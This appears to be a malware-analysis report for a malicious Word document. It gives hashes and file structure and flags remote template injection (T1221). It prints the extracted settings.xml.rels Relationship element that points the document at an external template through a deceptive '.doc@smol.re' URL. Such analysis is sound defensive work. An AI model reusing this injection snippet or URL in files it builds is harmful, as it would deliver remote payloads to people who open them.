Malicious
Malicious

e47d1c09d1dd20778dff10daed903426bc0790[...]doc.bin

MS Word Document
|
MD5: bd93ec547a27307eb937014f228cec39
|
Size: 57.16 KB
|
application/msword

Office Document
T1221
Remote Template Injection
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
bd93ec547a27307eb937014f228cec39
Sha1
156d6b4aa005f0c934d774337db349fe4b551352
Sha256
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1
Sha384
96a40cd7a64e7e4ce84f4317ac9a96c54539453b6553332f480915f30bb25541370a1289048706a9d1f603d8d09e245e
Sha512
e9146cd20e44d24b708ecdda3271260d56f92fd879db4688e21adb6ec20fd8d904d957475ef855254c8e33fa87a3c481f5a90ef8360b5c9320f92acb4a0fc7f5
SSDeep
1536:QK1tteJcM4ZeFbBxK7TLtMSrbzMUSCwO6H+m35iUkg98B:QK1tteWMoepWd5ByH+orkg98B
TLSH
6743F16B75A04486E71E853E5506A348ED8DB3C6876B12716328BFFD4AFF4DE8E02604
File Structure
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin
Office Document
T1221
Remote Template Injection
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
T1221
Remote Template Injection
Malicious
document.xml
Xml
footnotes.xml
Xml
footer3.xml
Xml
footer2.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
embeddings
Malicious
Microsoft_Office_Excel_97-2003_Worksheet1.xls
Office Document
Malicious
.
Root Entry
Ole
EPRINT
CompObj
ObjInfo
Workbook
SummaryInformation
DocumentSummaryInformation
[Formulas]
Malicious
media
image1.emf
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
styles.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious Document RelationShip

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin (57.16 KB)
File Structure
e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin
Office Document
T1221
Remote Template Injection
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
T1221
Remote Template Injection
Malicious
document.xml
Xml
footnotes.xml
Xml
footer3.xml
Xml
footer2.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
embeddings
Malicious
Microsoft_Office_Excel_97-2003_Worksheet1.xls
Office Document
Malicious
.
Root Entry
Ole
EPRINT
CompObj
ObjInfo
Workbook
SummaryInformation
DocumentSummaryInformation
[Formulas]
Malicious
media
image1.emf
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
styles.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Characteristics
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value Location
Remote Template - Highly Suspicious Document RelationShip

https://sheismybestpersonisaweverysingledaywithmegrat.doc@smol.re/Q0lM9J

Malicious

e47d1c09d1dd20778dff10daed903426bc07908909521af0303ca555153cddf1.doc.bin > word > _rels > settings.xml.rels
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙